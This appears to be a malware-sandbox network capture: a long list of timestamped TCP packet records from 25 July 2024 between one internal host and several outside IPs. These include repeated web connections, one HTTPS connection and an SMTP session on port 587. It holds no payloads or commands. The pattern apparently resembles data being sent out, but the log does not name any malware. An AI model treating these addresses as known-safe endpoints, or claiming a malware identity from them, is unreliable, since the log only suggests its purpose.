Jul 25, 2024 10:05:10.636497021 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:10.710103035 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:10.710133076 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:10.710308075 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:10.710316896 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:10.710437059 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:10.730474949 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:10.730639935 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:10.796252012 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:10.796376944 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:10.797065020 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:10.797138929 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:10.798047066 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:10.798119068 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:10.816549063 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:10.816631079 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:11.068833113 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:11.068849087 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:11.068979979 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:11.069163084 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:11.069195986 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:11.069241047 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:11.069246054 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:11.069295883 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:11.069669962 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:11.069713116 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:11.069736004 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:11.069768906 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:11.069772005 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:11.069957018 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:11.070463896 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:11.070494890 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:11.070579052 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:11.070583105 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:11.070681095 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.117763042 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.117777109 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.117877007 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.118104935 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.118175983 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.118406057 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.118464947 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.118735075 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.118798018 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.119473934 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.119543076 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.120352030 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.120413065 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.121236086 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.121299028 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.121922016 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.121984005 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.123445988 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.123507977 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.123831987 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.123894930 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.127146959 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.127211094 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.127825022 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.127888918 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.128598928 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.128658056 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.129072905 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.129128933 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.130034924 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.130094051 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.130543947 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.130599976 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.131800890 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.131836891 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.131859064 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.131864071 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.131885052 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.131902933 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.132606983 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.132664919 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.132699013 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.132736921 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.132756948 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.132761002 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.132781029 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.132792950 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.132796049 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.132837057 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.142045975 CEST	49715	443	192.168.2.5	108.167.181.251
Jul 25, 2024 10:05:12.142057896 CEST	443	49715	108.167.181.251	192.168.2.5
Jul 25, 2024 10:05:12.459999084 CEST	49716	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:12.464929104 CEST	80	49716	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:12.465009928 CEST	49716	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:12.465281010 CEST	49716	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:12.470071077 CEST	80	49716	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:20.347295046 CEST	80	49716	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:20.350888968 CEST	49716	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:20.356040001 CEST	80	49716	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:21.518094063 CEST	80	49716	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:21.569955111 CEST	49716	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:21.749022961 CEST	49717	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:21.749061108 CEST	443	49717	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:21.749218941 CEST	49717	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:21.750690937 CEST	49717	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:21.750705004 CEST	443	49717	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:22.271240950 CEST	443	49717	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:22.271323919 CEST	49717	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:22.274976015 CEST	49717	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:22.274986982 CEST	443	49717	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:22.275331974 CEST	443	49717	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:22.280320883 CEST	49717	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:22.320494890 CEST	443	49717	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:22.428028107 CEST	443	49717	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:22.428299904 CEST	443	49717	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:22.428405046 CEST	49717	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:22.433322906 CEST	49717	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:22.442203999 CEST	49716	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:22.447129965 CEST	80	49716	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:23.832575083 CEST	80	49716	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:23.834600925 CEST	49718	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:23.834657907 CEST	443	49718	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:23.834745884 CEST	49718	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:23.835012913 CEST	49718	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:23.835047007 CEST	443	49718	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:23.882523060 CEST	49716	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:24.334069967 CEST	443	49718	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:24.335887909 CEST	49718	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:24.335920095 CEST	443	49718	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:24.468348980 CEST	443	49718	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:24.468472958 CEST	443	49718	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:24.468544960 CEST	49718	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:24.468960047 CEST	49718	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:24.472268105 CEST	49716	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:24.473438978 CEST	49719	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:24.478468895 CEST	80	49719	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:24.478554010 CEST	49719	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:24.478636026 CEST	49719	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:24.483918905 CEST	80	49719	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:24.490802050 CEST	80	49716	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:24.490874052 CEST	49716	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:32.717781067 CEST	80	49719	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:32.719419003 CEST	49721	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:32.719472885 CEST	443	49721	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:32.719579935 CEST	49721	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:32.719873905 CEST	49721	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:32.719902039 CEST	443	49721	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:32.773118973 CEST	49719	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:33.212629080 CEST	443	49721	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:33.221705914 CEST	49721	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:33.221798897 CEST	443	49721	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:33.365952015 CEST	443	49721	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:33.366096020 CEST	443	49721	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:33.366291046 CEST	49721	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:33.366688013 CEST	49721	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:33.371121883 CEST	49722	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:33.376122952 CEST	80	49722	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:33.376209974 CEST	49722	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:33.376296997 CEST	49722	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:33.381577015 CEST	80	49722	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:45.499855995 CEST	80	49722	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:45.501215935 CEST	49723	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:45.501264095 CEST	443	49723	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:45.501343012 CEST	49723	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:45.501585960 CEST	49723	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:45.501595020 CEST	443	49723	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:45.554429054 CEST	49722	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:45.962045908 CEST	443	49723	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:45.963740110 CEST	49723	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:45.963773012 CEST	443	49723	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:46.110181093 CEST	443	49723	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:46.110404015 CEST	443	49723	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:46.110502005 CEST	49723	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:46.110809088 CEST	49723	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:46.114377975 CEST	49722	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:46.114922047 CEST	49724	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:46.119822979 CEST	80	49724	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:46.119976044 CEST	49724	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:46.120785952 CEST	49724	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:46.122132063 CEST	80	49722	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:46.122215986 CEST	49722	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:46.125597000 CEST	80	49724	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:52.240860939 CEST	80	49724	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:52.241206884 CEST	80	49724	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:52.241305113 CEST	49724	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:52.261405945 CEST	49725	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:52.266441107 CEST	80	49725	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:52.266551018 CEST	49725	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:52.266782045 CEST	49725	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:52.271703959 CEST	80	49725	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:53.057436943 CEST	80	49725	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:53.057872057 CEST	49724	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:53.058773994 CEST	49726	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:53.058820963 CEST	443	49726	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:53.059039116 CEST	49726	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:53.059446096 CEST	49726	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:53.059456110 CEST	443	49726	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:53.064575911 CEST	80	49724	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:53.064647913 CEST	49724	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:53.101300955 CEST	49725	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:53.603132010 CEST	443	49726	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:53.604880095 CEST	49726	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:53.604904890 CEST	443	49726	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:53.749618053 CEST	443	49726	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:53.749741077 CEST	443	49726	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:53.749809980 CEST	49726	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:53.750427961 CEST	49726	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:53.754084110 CEST	49725	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:53.755458117 CEST	49727	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:53.761039972 CEST	80	49725	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:53.761112928 CEST	49725	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:53.761285067 CEST	80	49727	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:53.761349916 CEST	49727	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:53.761452913 CEST	49727	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:53.767155886 CEST	80	49727	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:56.685353994 CEST	80	49727	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:56.687074900 CEST	49728	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:56.687113047 CEST	443	49728	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:56.687280893 CEST	49728	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:56.687468052 CEST	49728	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:56.687475920 CEST	443	49728	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:56.726424932 CEST	49727	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:57.230670929 CEST	443	49728	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:57.232511997 CEST	49728	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:57.232525110 CEST	443	49728	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:57.379291058 CEST	443	49728	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:57.379398108 CEST	443	49728	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:57.379503965 CEST	49728	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:57.379930019 CEST	49728	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:57.383555889 CEST	49727	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:57.384979010 CEST	49729	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:57.389113903 CEST	80	49727	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:57.389173985 CEST	49727	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:57.390050888 CEST	80	49729	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:57.390372038 CEST	49729	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:57.390372038 CEST	49729	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:57.395626068 CEST	80	49729	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:59.175483942 CEST	80	49729	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:59.176990986 CEST	49730	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:59.177026987 CEST	443	49730	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:59.177144051 CEST	49730	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:59.177539110 CEST	49730	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:59.177552938 CEST	443	49730	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:59.226393938 CEST	49729	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:59.659151077 CEST	443	49730	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:59.661120892 CEST	49730	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:59.661142111 CEST	443	49730	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:59.809408903 CEST	443	49730	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:59.809501886 CEST	443	49730	188.114.97.3	192.168.2.5
Jul 25, 2024 10:05:59.809575081 CEST	49730	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:59.810234070 CEST	49730	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:05:59.813668966 CEST	49729	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:59.815330029 CEST	49731	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:59.821476936 CEST	80	49729	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:59.821506977 CEST	80	49731	193.122.6.168	192.168.2.5
Jul 25, 2024 10:05:59.821676970 CEST	49731	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:59.821676970 CEST	49731	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:59.821934938 CEST	49729	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:05:59.826973915 CEST	80	49731	193.122.6.168	192.168.2.5
Jul 25, 2024 10:06:01.481292009 CEST	80	49731	193.122.6.168	192.168.2.5
Jul 25, 2024 10:06:01.483108997 CEST	49732	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:06:01.483148098 CEST	443	49732	188.114.97.3	192.168.2.5
Jul 25, 2024 10:06:01.483256102 CEST	49732	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:06:01.483844042 CEST	49732	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:06:01.483859062 CEST	443	49732	188.114.97.3	192.168.2.5
Jul 25, 2024 10:06:01.523216963 CEST	49731	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:06:01.994290113 CEST	443	49732	188.114.97.3	192.168.2.5
Jul 25, 2024 10:06:01.996455908 CEST	49732	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:06:01.996479034 CEST	443	49732	188.114.97.3	192.168.2.5
Jul 25, 2024 10:06:02.130865097 CEST	443	49732	188.114.97.3	192.168.2.5
Jul 25, 2024 10:06:02.130999088 CEST	443	49732	188.114.97.3	192.168.2.5
Jul 25, 2024 10:06:02.131061077 CEST	49732	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:06:02.131465912 CEST	49732	443	192.168.2.5	188.114.97.3
Jul 25, 2024 10:06:02.144761086 CEST	49731	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:06:02.153523922 CEST	80	49731	193.122.6.168	192.168.2.5
Jul 25, 2024 10:06:02.153678894 CEST	49731	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:06:02.158296108 CEST	49733	443	192.168.2.5	149.154.167.220
Jul 25, 2024 10:06:02.158329964 CEST	443	49733	149.154.167.220	192.168.2.5
Jul 25, 2024 10:06:02.158390999 CEST	49733	443	192.168.2.5	149.154.167.220
Jul 25, 2024 10:06:02.158875942 CEST	49733	443	192.168.2.5	149.154.167.220
Jul 25, 2024 10:06:02.158893108 CEST	443	49733	149.154.167.220	192.168.2.5
Jul 25, 2024 10:06:02.819839954 CEST	443	49733	149.154.167.220	192.168.2.5
Jul 25, 2024 10:06:02.819937944 CEST	49733	443	192.168.2.5	149.154.167.220
Jul 25, 2024 10:06:02.823020935 CEST	49733	443	192.168.2.5	149.154.167.220
Jul 25, 2024 10:06:02.823029995 CEST	443	49733	149.154.167.220	192.168.2.5
Jul 25, 2024 10:06:02.823359966 CEST	443	49733	149.154.167.220	192.168.2.5
Jul 25, 2024 10:06:02.824852943 CEST	49733	443	192.168.2.5	149.154.167.220
Jul 25, 2024 10:06:02.872489929 CEST	443	49733	149.154.167.220	192.168.2.5
Jul 25, 2024 10:06:03.177937031 CEST	443	49733	149.154.167.220	192.168.2.5
Jul 25, 2024 10:06:03.177998066 CEST	443	49733	149.154.167.220	192.168.2.5
Jul 25, 2024 10:06:03.178160906 CEST	49733	443	192.168.2.5	149.154.167.220
Jul 25, 2024 10:06:03.178571939 CEST	49733	443	192.168.2.5	149.154.167.220
Jul 25, 2024 10:06:08.880276918 CEST	49719	80	192.168.2.5	193.122.6.168
Jul 25, 2024 10:06:09.131901026 CEST	49734	587	192.168.2.5	66.29.159.53
Jul 25, 2024 10:06:09.136874914 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:09.137160063 CEST	49734	587	192.168.2.5	66.29.159.53
Jul 25, 2024 10:06:10.481323957 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:10.481558084 CEST	49734	587	192.168.2.5	66.29.159.53
Jul 25, 2024 10:06:10.488656998 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:10.736872911 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:10.737097025 CEST	49734	587	192.168.2.5	66.29.159.53
Jul 25, 2024 10:06:10.742297888 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:10.896609068 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:10.897536039 CEST	49734	587	192.168.2.5	66.29.159.53
Jul 25, 2024 10:06:10.906554937 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:11.055099964 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:11.055125952 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:11.055146933 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:11.055232048 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:11.055247068 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:11.055250883 CEST	49734	587	192.168.2.5	66.29.159.53
Jul 25, 2024 10:06:11.055294037 CEST	49734	587	192.168.2.5	66.29.159.53
Jul 25, 2024 10:06:11.088752031 CEST	49734	587	192.168.2.5	66.29.159.53
Jul 25, 2024 10:06:11.095947027 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:11.247514963 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:11.250340939 CEST	49734	587	192.168.2.5	66.29.159.53
Jul 25, 2024 10:06:11.255323887 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:11.406343937 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:11.406676054 CEST	49734	587	192.168.2.5	66.29.159.53
Jul 25, 2024 10:06:11.411526918 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:11.563924074 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:11.566451073 CEST	49734	587	192.168.2.5	66.29.159.53
Jul 25, 2024 10:06:11.571614981 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:11.726864100 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:11.727293015 CEST	49734	587	192.168.2.5	66.29.159.53
Jul 25, 2024 10:06:11.732264042 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:11.886275053 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:11.886509895 CEST	49734	587	192.168.2.5	66.29.159.53
Jul 25, 2024 10:06:11.896810055 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:12.076332092 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:12.076586962 CEST	49734	587	192.168.2.5	66.29.159.53
Jul 25, 2024 10:06:12.081533909 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:12.232597113 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:12.233282089 CEST	49734	587	192.168.2.5	66.29.159.53
Jul 25, 2024 10:06:12.233339071 CEST	49734	587	192.168.2.5	66.29.159.53
Jul 25, 2024 10:06:12.233377934 CEST	49734	587	192.168.2.5	66.29.159.53
Jul 25, 2024 10:06:12.233406067 CEST	49734	587	192.168.2.5	66.29.159.53
Jul 25, 2024 10:06:12.238388062 CEST	587	49734	66.29.159.53	192.168.2.5
